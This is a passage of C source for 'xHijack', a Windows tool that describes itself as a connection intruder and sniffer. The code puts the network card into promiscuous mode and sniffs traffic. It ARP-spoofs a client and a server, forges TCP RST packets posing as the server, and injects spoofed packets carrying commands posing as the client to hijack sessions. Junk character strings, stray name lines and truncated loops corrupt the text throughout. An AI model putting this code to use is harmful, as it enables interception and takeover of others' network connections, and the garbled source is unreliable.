'\0') " I8 ?- R* k( y l q5 C0 W { ; Q4 o* @* D+ w$ P% s3 ] memcpy(AdapterList,temp1,(temp-temp1)*2); 6 I1 M' G# }" K- `* J2 Q# n4 c printf("%d - %S\n", i+1, AdapterList); temp1=temp+1; ' W$ F4 S+ {% y d i++; } temp++; , e& M" w: G4 C% }% m6 @6 D( K } //choose adapter # X4 L% V. O, C. h4 l' _& x: B7 e while((iAdapter <= 0) || (iAdapter > i)) 6 r+ D% q; X3 ?# m1 r" ^ { printf("\nPlease choose your Adapter:"); / ~/ U% N. t9 \* Y/ e o scanf("%1d", &iAdapter); } ' {3 d0 y7 O* N printf("\n"); : ]! z: T* S! F; ^( W$ _; J2 ]' k //---------------------------------------------// 5 Z! }- B$ E% Y. V! _ Y* p3 Y //这里调用iphlpapi来取得本地ip_addr和mac_addr sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], sizeof(szSelectAdapterName)-1); % W3 {) _) ~ b% W$ i0 V dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_BUFFER_OVERFLOW) { printf("GetAdapterInfo error:%d\n", GetLastError()); / q7 ^+ p0 A2 q4 l0 R- J/ K0 I4 a return 0; } ; K) U# Y3 s) ?. { E, N$ `: ~ pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); 7 {" A6 c# U5 T, j" J' ]& ]# L% i if(!pAdapterInfo) ; E, S5 {- V, I { 4 D; n! N) r+ t6 ~. B printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); ) ^$ i5 @6 u" Z; r* M" q return 0; ( J& B( v1 C/ y% y* b6 e- _ } dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_SUCCESS) ' @7 R; ?; g( P+ E/ w( i { printf("GetAdapterInfo error:%d\n", GetLastError()); return 0; 5 J5 t' E7 \; I" } } pTmp = pAdapterInfo; while(pTmp) & g5 d* ?" h- M8 c, x { //字符匹配

韩冰

if(strstr(szSelectAdapterName, pTmp->AdapterName)) # R% U3 S( X% ~( O { //found it,get own adapter mac address * R& o- P: t' @9 g memcpy(g_szOwnMAC, pTmp->Address, 6); //get ip address & i3 j$ p1 _2 O! @9 f pIPAddr = &pTmp->IpAddressList; ' `% U$ z7 u: @& |% O while(pIPAddr) { 5 i6 R! e# _9 u2 B: ? g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); pIPAddr = pIPAddr->Next; 1 m4 ?! L$ G0 S if(g_TotalIP >= Max_Num_IPAddr) break; # _: h# H2 t" i: C9 q+ v } % g# w2 s! q' |: J3 g2 p6 | break; * R7 I+ a) N4 M! ]' p% {: A0 L } ! j( C8 h! ? X( D/ {# G$ K pTmp = pTmp->Next; } 1 V. a& L. Y2 O" h4 X4 a free(pAdapterInfo); ; [* K1 o+ q' t N0 S$ Q% n) h //not found,return zero 7 b( x D; F n7 j( F) u if( (!pTmp) || (!g_TotalIP) ) return 0; / X9 R0 U/ l4 v8 x% | //---------------------------------------------// //open adapter 6 |7 d- ^ G0 U: I9 ~ lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); M& e/ R: f8 s0 A if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) { iRetCode = GetLastError(); printf("Unable to open the driver, Error Code : %lx\n", iRetCode); return 0; } // set the network adapter in promiscuous mod if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) , P7 T$ K7 i, o( y, S# M% Q8 M# z { - s5 A) W( ~3 \; T& [ printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) ; `4 N! @. s0 y: C { ) F d4 G' L8 Y printf("Unable to set ALL_LOCAL mode!\n"); return 0; } 2 Z6 r, S4 u% ~! U; M' d } * Y) f/ Z: ~9 F1 v) D5 r5 J$ f // set a 512K buffer in the driver ( Q$ l3 {3 K. s4 C* y- } if(PacketSetBuff(lpAdapter, 512000) == FALSE) & O% U+ Z \& A# d; W8 y6 P" A" T { # }3 U0 ` u; I8 [ z! j* B printf("Unable to set the kernel buffer!\n"); C) N4 m0 }6 k return 0; } // set a 1 second read timeout + f( |9 A) p8 B1 U" y0 J9 ` if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) * H: I3 I4 N3 V) g/ s printf("Warning: unable to set the read tiemout!\n"); if(PacketSetNumWrites(lpAdapter, 1) == FALSE) printf("warning: Unable to send more than one packet in a single write!\n"); l- J( [$ L1 _- y* R- n //设置发送的packet g_lpSendPacket = PacketAllocatePacket(); / u; p' U7 c/ y1 S; Z; h if(g_lpSendPacket == NULL) { " b1 I. F2 x, ~9 R2 |) G printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); return 0; } 1 d/ O B" @! p$ }( m ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); ' p, y I6 O& H# U% F" E } PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); ( o/ X S2 u7 }4 L1 w: | return lpAdapter; } //功能：帮助信息 7 \, l& M; l7 J+ b yvoid usage() { " Y6 \3 O- {) @) g printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" / h" {8 O- i# Y4 O a l% C$ X "By eyas 2002/8/19\n" "http://www.ey4s.org\n" "Thanks to Refd0m and shotgun\n\n" ! G2 M! {* {0 q. V "Usage: xHijack ServerSide ClientSide\n\n"); } 5 j6 A( z' s; ]' I* O , Z l0 l% b% v; K( r7 z9 G// & \: R( P+ }% Y3 U//功能：显示数据包的一些详细信息 & f* d, X1 N$ t# Y9 U( H, g// VOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) 8 }* C1 @& V3 L6 T{ + b& e! \* g8 d8 }& P( C9 q SOCKADDR_IN saDest, saSrc; unsigned char FlagMask; ; X" Z# G6 ~, f3 b! m& R3 g int i; 3 ]2 o, a8 x+ N9 S% C saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; ) t0 r1 ]: `& X8 T4 K0 z saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); 1 f, ^! ^8 C8 c- J# s% O //display TCP flag 7 J) @" k$ \7 E& K for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) \$ z3 ] o3 v# m# V; F+ V7 x5 u { if((pTCPPacket->tcphdr.th_flag) & FlagMask) ! J) Y1 a, }$ V( ?$ K! m' G, n printf("%c", g_szTcpFlag); else printf("-"); % g0 J( ~. i/ k& C+ o } printf("\n"); //如有需要，可显示更多详细的信息 3 l" T- a# n# _; H; I if(bDetail) printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); 0 d' o+ t& E8 {# C} ; }3 Q1 |+ A- o* Z# w 9 z, o8 ~& `( U: O/ y// / X- }5 U4 U$ h* p* O/ y5 X//功能：处理收到的数据包(只分析本不属于自己的包)，然后根据用户输入，完成各种功能 // DWORD WINAPI AnalysePacketsThread(LPVOID lp) { - E S% e! t3 U4 s/ s ULONG ulBytesReceived; 0 F; A, I" M) ^ USHORT usDataLen; //USHORT usIPHeadLen, usTCPHeadLen; char *buf; u_int off, i; PTCPPACKET pTCPPacket; 8 ^! H3 k8 ^' H* n2 G8 s9 S. v6 [ struct bpf_hdr *hdr; ' N- A D q6 I4 d3 U! o LPPACKET lpRecvPacket; : B5 v) ~* `( W char szPacketBuf[256000], *pStr; BOOL bDeleteNode, bAddNew; 9 O8 F* H& n4 J; O2 W DWORD ident;//当前所处理的数据包，所属的连接的唯一标识 ) e, V6 t+ ^8 Q9 D: L BOOL bClientToServer;//数据包是否从客户端发送到服务器端 //设置接收的packet lpRecvPacket = PacketAllocatePacket(); % T) @9 Q* x8 W( O0 W if(lpRecvPacket == NULL) { ( f" H; k2 |0 V; b8 e4 N5 U& p printf("Error:failed to allocate the LPPACKET structure for recv.\n"); return 0; } # F+ i* Q5 X C1 o5 y, h8 k ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); while(1) * X7 |, m! L4 p { // capture the packets 3 z. D) |! o* m5 U6 b1 U if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) { + y5 l" U9 O2 a9 n% i3 I* z printf("Error: PacketReceivePacket failed.\n"); 8 h' z/ |5 t. r' c6 u+ m1 { break; 2 B( K, `5 P/ M" X5 h* u; z } ulBytesReceived = lpRecvPacket->ulBytesReceived; buf = lpRecvPacket->Buffer; ; o! b( A: h' u- | D off = 0; while(off < ulBytesReceived) { , v6 I7 D& t6 W3 W( B- w# c) x hdr = (struct bpf_hdr *)(buf + off); off += hdr->bh_hdrlen; pTCPPacket = (PTCPPACKET)(buf + off); $ r8 w: s5 W q7 [0 X5 {3 J off = Packet_WORDALIGN(off + hdr->bh_caplen); //不需要处理自己发出的包(转发或本机发送的) 0 j- i/ z7 S4 U0 _, { if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; //检查是否IP包 / L3 S; p' d/ U" N+ M if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; //检查是否TCP包 9 V# S, L+ z g! x6 q( Y1 N) x if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; //也不处理DestIP是自己的包 " `' X5 [' b) ]) C for(i=0; i

韩冰

pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE);
            //reset action flag
6 h4 g8 N" j; O! W) }$ O            ResetActionAllFlag();
          }
! ?/ M2 w/ R+ S# {; r9 c) U4 L& g; B$ S5 _$ \          //start hijack
" F3 ?9 M6 _% p( p' b! L5 ^          else if(g_dwAction == ACTION_HIJACK)
          {
3 ]* Z, q0 h* |7 l% ^: t; h. U1 m            //send rst packet to client
            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq);
            //send hijack packet to client
            SendHiJackPacket(pTCPPacket);
% h& o+ }( h1 i, T1 K% S            //reset action flag
            ResetActionAllFlag();
/ W2 O4 t+ |$ s, D4 A1 c) z3 ~5 o          }
5 y4 t( p, x+ ^+ c# f        }
        //show the tcp data
; ]  N! ~" Y) G: }3 `8 i        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) )
; ^+ a& C/ y' G6 i1 \# `* E        {
5 l5 d, T0 U. u8 _( t: Q% O          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
          //暂不考虑IP、TCP头不是20字节的情况
          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
          pStr = (char *)pTCPPacket + 54;
          for(i=0; i        }
      }
* k" M- ^. ]" ~) V      //debug output
8 q4 F6 W6 U7 z3 k      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
    }//end of analyse packets while
) M8 m0 L, k6 x- ~: R; ^  }//end of recv packets while
  PacketFreePacket(lpRecvPacket);
, [6 j1 n  _) x7 E" o1 e0 k  return 0;
}

2 N9 n9 ]+ c5 }8 I
/ W" H* D8 U7 o: z//
//功能：操作记录所有连接信息的单向链表
//
DWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
7 Q6 o  Z3 M/ @8 S" P  h+ S            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
{
# E& b6 ^. q' `; Z6 |% }  PCONNINFO  pNew, pTmp;

  pTmp = g_pConnHead;
  while(pTmp)
  {
    if(pTmp-&gt;bActive)
    {
- F" F4 _+ p3 f. I5 i& ^) w0 s      //found it
      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp;
2 \/ F' ~* w3 h+ Z; r        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp;
; L- d/ z2 \6 x. \        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp;
7 b$ ~) X. x6 G  U* R9 |        (pTmp-&gt;uClientPort == uClientPort) )
: r# s  `8 k3 U- F      {
        if(bDelete)
) _: [6 t" \- }1 V5 K) w        {
          pTmp-&gt;bActive = FALSE;
- n1 w+ o( G0 {1 c1 w. W) c          return 0;
1 I$ p/ {2 d6 n, f, O! T0 U/ f        }
5 `3 K2 A# d  W1 r        else return pTmp-&gt;ident;
0 Q3 Y( r+ {) U5 g6 t1 {* z      }
9 e: b$ T4 [- ?7 e    }
    pTmp = pTmp-&gt;Next;
  A4 L" x( @6 {# N7 H  }
; f1 }+ d. Q" a& ^1 q, y/ R  //not found, create new node
  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) )
  {
* a  c& ?8 Q- _7 L% r9 r7 F    //search unactive note
8 m" p' K" c% t    pTmp = g_pConnHead;
    while(pTmp)
    {
) k+ [. h  h$ w& @; \8 L/ [      if(!pTmp-&gt;bActive) break;
      pTmp = pTmp-&gt;Next;
$ `! `3 ^" J: A4 p2 a    }
    //found a unactive node
5 p+ `$ f5 y* V* C    if(pTmp)
  O% \! @# ?3 l% Q3 L9 |7 }! o    {
      pTmp-&gt;dwServerIP = dwServerIP;
: [& o8 z+ E9 m- m$ U      pTmp-&gt;uServerPort = uServerPort;
      pTmp-&gt;dwClientIP = dwClientIP;
( x4 \2 C+ t: T) q% _. s      pTmp-&gt;uClientPort = uClientPort;
# r) x* V% p; U9 ^3 x. V      pTmp-&gt;bActive = TRUE;
2 v1 b, a( ?1 k4 p! R6 L      return pTmp-&gt;ident;
, v6 W$ I7 d, C0 l    }
    //not found,create new node
    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
: d. N# k  G8 `2 ^, M    if(!pNew)
    {
      printf("malloc for link node error:%d\n", GetLastError());
      return 0;
$ G/ V  U9 B. o6 J1 P0 l# |' [    }
    //fill the struct
    pNew-&gt;bActive = TRUE;
8 n- S" f! e' T7 Q/ a2 b% M    pNew-&gt;dwServerIP = dwServerIP;
    pNew-&gt;uServerPort = uServerPort;
1 @9 U+ m. w( q; i$ L    pNew-&gt;dwClientIP = dwClientIP;
    pNew-&gt;uClientPort = uClientPort;
' d% D1 }, ]6 b& p3 J    pNew-&gt;ident = ++g_ident;
    pNew-&gt;Next = NULL;
    //add new node to link
    if(!g_pConnHead)
      g_pConnHead = g_pConnLast = pNew;
- C4 X5 k. ~  c    else
$ z- G* X2 u1 \    {
7 V1 w) e/ Q& M5 m+ E( V      g_pConnLast-&gt;Next = pNew;
      g_pConnLast = pNew;
    }
    return pNew-&gt;ident;
% }3 I1 [! y+ F% W/ o- i. L* A  }
2 K3 o0 N: u$ q* v) v  return 0;
# u* Z# t0 w# D}
# b& Q1 |' e3 m
% l7 A% q. @. }//
9 w+ i9 O" g3 f+ A//功能：判断一个数据包是不是只有ACK标志
//
) F4 z: K6 B" x! ^" k1 oBOOL IsACKPacket(unsigned char flag)
{
  int  i, j=1;
  for(i=0 ; i&lt;4; i++)
  {
! G" ]$ q0 y% C2 k% C) x    if(flag &amp; j) return FALSE;
5 m$ \, H  @$ F) [2 M6 t$ k    j &lt;&lt;= 1;
& z1 Y3 J- j8 f  H8 \! W" G  }
7 f' }$ ~7 C1 p1 w* c  if(!(flag &amp; 0x10)) return FALSE;//is ack?
; n* N, |) F7 o" Q- B- N  if(flag &amp; 0x20) return FALSE;
  return TRUE;
}

//
//功能：伪装成Client给Server发送数据包
//
. i5 P% g) W) }6 [BOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
8 ^4 F# H+ ~, A! Z- d{

  char    szBuff[1520];
  PSDHDR    psdhdr;
  PTCPPACKET  pHiJackPacket = NULL;
  BOOL    bRet = FALSE;
! f. Q- c' B7 J! o8 w
! [8 E) L% \+ H) q! c2 a  __try
  {
    //
    if(!g_pCurrCtrlConn) __leave;
& s" `' ]- |( S+ b$ p$ S' T& [    //allocate memory for hijack packet
% k4 q- A7 J* W; S6 p    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
% Q: U4 M. L5 R- K( a8 W$ o  B    if(!pHiJackPacket)
$ q3 B; J' I5 K    {
; m8 ?  N8 _3 S      printf("malloc error:%d\n", GetLastError());
      __leave;
    }
    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
1 n4 f4 M9 f4 L    //-------------- modify the packet ---------------//
    //modify ethernet head
    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
4 z' t* |) Q0 ^    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
( H7 Y6 t  q6 q( Q, ?    //modify ip head
    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
9 ~' `: s# }6 V" A: r5 {1 U    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1
) A4 u! q" V1 |+ Q+ l    pHiJackPacket-&gt;iphdr.checksum = 0;
$ C  C2 o% ?1 p6 n5 W" D4 f) A    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址，伪装成client
    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址，接收hijack包的地址
  O4 ]6 K* X9 I2 X    //modify tcp head
% \5 k1 n( _! t, L, ]! h" d% g    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
* z* z3 z" e9 u$ i# ^; \4 Q3 F    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port
    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
    pHiJackPacket-&gt;tcphdr.th_sum = 0;
    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
, ^' L$ @( g+ a7 J) T1 P    //fill tcp psd head
# ^& @2 r* C4 P* \    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           
: p! P  \6 m  i: s. v( b4 \    psdhdr.mbz = 0;
" ^6 v# N, L$ S2 ^    psdhdr.ptcl = IPPROTO_TCP;
# N9 ~: e. A2 @1 ~3 J/ S' W8 l    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len
    //calculate tcp checksum     
1 @1 F, l. x. l7 t/ O1 }% S, K5 y* K    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
3 J( a- K) Q) |3 \8 R/ R    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
( t* _# [, e  a. W6 C2 y    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
0 \+ Y. b+ ~" }; i. f9 l    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
. q- X+ Z( y2 m+ K" C3 D; y+ G    //calculate IP checksum
$ F! q5 R/ |2 H$ l* k9 L: i, |& t0 y    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
1 {* p1 d; v9 B. \# V, H    //fill send buffer           
( C& ?1 {; p) O# s& C9 t; x7 @1 ^0 ^    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand));
7 c4 F3 P' K5 V4 r7 g" U& R    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4);
4 H$ Y& U) a& C. ?1 X1 s    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
+ G) ]# E/ I' ~+ N; p9 O8 |    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
+ n  f" B0 G- D7 |      printf("Error sending the hijack packets!\n");
7 w+ ^# |: I, g0 \      __leave;
    }
) f  B+ p( v% V( P6 K    else printf("Send hijack packet ok!\n");
' T: g6 {& Y! c9 T6 V1 N; A    bRet = TRUE;
  }

韩冰

__finally
6 `3 F! E6 c* s  {
2 a$ p8 \" A( N9 \- o; U0 O/ o- d    if(pHiJackPacket) free(pHiJackPacket);
  S" x7 l* L8 [" |  L  }
  i3 `" s. R* ~( t7 \- ~  return bRet;
% \- T0 I: O* ?}

6 ^2 X% T8 h0 W" A: D8 U( |
) J6 |& M2 z& a- C& C' L# C//
8 a/ f$ u) t2 S( Y7 j, h8 i//功能：伪装成Server给Client发送rst包
//
BOOL SendRstPacket(unsigned int seq, unsigned int ack)
{
  char    szBuff[60];
7 ~# X+ J* |  A# n# f8 }  @* x3 w  PSDHDR    psdhdr;
9 @; j- _* h) [8 a5 m+ b/ y  PTCPPACKET  pTcpPacket = NULL;
  BOOL    bRet = FALSE;

  __try
  {
" ~1 }4 c$ ^0 J) r3 i# \7 b    //检查当前指向想控制的连接的信息的指针是否为空
    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for rst packet
    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
* T' C& f7 a- B  ]$ _3 x- ]    if(!pTcpPacket)
% |8 R! L3 |; _# u' e# u" a4 |; a  A    {
6 }/ [: c! C1 g0 h      printf("malloc error:%d\n", GetLastError());
      __leave;
) ^) H7 M5 u4 Q: H    }
: s! O# v' F( S1 a! u    //fill ethernet head
+ x/ ^/ u7 ~6 y+ F2 P2 o    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
  T7 W) h# M0 R8 x2 A) `: k4 i    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
    //fil ip head
    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pTcpPacket-&gt;iphdr.tos = 0;
4 p' w- \" L  d) Q& H$ s    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
    pTcpPacket-&gt;iphdr.ident = 1;
8 b# O& g9 @. k9 M) J$ P9 R( _    pTcpPacket-&gt;iphdr.frag_and_flags = 0;
    pTcpPacket-&gt;iphdr.ttl = 128;
    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP;
* D) B# a& P% B5 X    pTcpPacket-&gt;iphdr.checksum = 0;
& h% ^0 Z# |9 M3 L    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址，伪装成服务器的
    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
' B* w& z" Q- i: g. s0 F9 F' U; W    //fill tcp head
$ _4 {. C1 ~6 z    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号，伪装成服务器的端口
    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口
    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
+ d* V7 m3 P) E0 v% A    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK
    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
    pTcpPacket-&gt;tcphdr.th_win = 0;
: c; k: |* |# O7 x$ T7 C4 j" [) h6 M    pTcpPacket-&gt;tcphdr.th_urp = 0;
2 A9 [" A& b' |1 j    pTcpPacket-&gt;tcphdr.th_sum = 0;
% o+ n7 L: N7 G# v/ J" X$ T    //fill tcp psd head
$ o; _+ w) |! t    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           
    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
1 B; X$ p  m6 c; K( j    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR));
1 b- r$ z8 ^, ?  {% m$ f    //calculate tcp checksum     
0 ?9 s* Z  A! t! T8 v6 V0 b    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
7 ~- o& a+ D& [! s+ n) b3 l    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR));
( N& K4 t) r* j0 J" Q( S+ H1 Q( C    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
4 E+ W% {% W) g5 r0 a$ V' I    //calculate IP checksum
    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR));
    //fill send buffer
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
5 r# P7 C7 S+ j# m+ Y& ?; A    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
      printf("Error sending the rst packets!\n");
  ^- y2 a7 e/ z) D      __leave;
0 n* [/ Q6 m  f6 D# R+ ]& Z2 e, h- f    }
0 ~* d1 ~7 F  E- H% C  |    else printf("Send RST packet ok!\n");
    bRet = TRUE;
$ i% B4 u- W' _0 p- G- g  }
, A7 ~4 W- o8 D% K+ g& }2 |9 _  __finally
9 h, g: G0 b. @3 [0 I  {
    if(pTcpPacket) free(pTcpPacket);
4 K8 v3 ^( z  T) J+ V8 q& T. w3 }  }
  return bRet;
}
+ {9 f: A2 K6 a% N
//
6 E3 Y+ {0 c! n//功能：计算校验和
//
USHORT checksum(USHORT *buffer, int size)
3 D: M9 \+ S3 ~& D( X& v{
' @+ X; ], \) i" M+ R! ~2 v9 \ unsigned long cksum=0;
  J5 ^/ ?4 C7 t while(size &gt;1) {
5 t! W4 c; ~' w  cksum+=*buffer++;
  size -=sizeof(USHORT);
}
if(size ) {
) ?6 v. u9 z, b% g, q# b( p  cksum += *(UCHAR*)buffer;
}
' \* j$ p) S# w$ n- G& |7 r cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
# t6 `, p5 x4 ~' C: j cksum += (cksum &gt;&gt;16);
/ M( O( m* ?1 k return (USHORT)(~cksum);
6 ^3 f% h4 `: |}
9 Q( Y0 [; ]5 d# A2 L
//
0 a) ?2 z/ u& P7 Q  P//功能:实施ARP欺骗
0 Q4 N) N( z. x0 a1 _5 H//1 告诉ServerSide,ClientSide的mac是ownmac
//2 告诉ClientSide,ServerSide的mac是ownmac
//
; U# i, J. g7 ]DWORD WINAPI ArpSpoofThread(LPVOID lpType)
{
  int  iType = *(int *)lpType;
  ARPPACKET  ArpPacket;
- s9 ^9 F- \3 |2 R  LPPACKET  lpArpPacket;
1 X" C4 o6 i6 V  char    szArpBuff[60];
* h; x2 z% U$ b, \
$ z3 v1 \. r3 Y& a7 G; G  switch(iType)
  {
    case 1:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ServerSideIP;
      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
2 `: ~, n1 X! I  m' M      break;
; t8 @! e" N9 Q    case 2:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ClientSideIP;
      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
$ P8 E: s9 d7 }6 z* H      break;
! T5 u6 x" w7 Y, i3 T* X0 \1 B    default:
      return 0;
& w. Y0 M$ h( o8 Y0 Z/ p  ], i  }
$ C* Z% v; \6 x. P! D  //ethernet head
! _+ Z. E' l0 O9 j  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
" u* Q3 K/ p; f  L7 m  //arp head
' p8 f$ _4 F% u( f  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
. f* J* j% G. m4 }% Z  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
4 W+ b5 I, ^; N, P# {( f" i5 a  ArpPacket.arphdr.HrdAddrlen = 6;
. E5 ?1 Y3 A; M. i* T  ArpPacket.arphdr.ProAddrLen = 4;
( h7 {) C* l! t0 h$ d, R! T$ @  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
  ArpPacket.arphdr.ProType = htons(EPT_IP);
1 B7 O+ [( u" T& P+ Z- L  ArpPacket.arphdr.op = htons(2);//arp reply

0 j. e' @9 z1 M# [- s  lpArpPacket = PacketAllocatePacket();
  if(lpArpPacket == NULL)
) ~* P6 v" z( T6 s3 M; d  {
    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
4 q; ]$ H  v7 I8 j* c    return 0;
  }
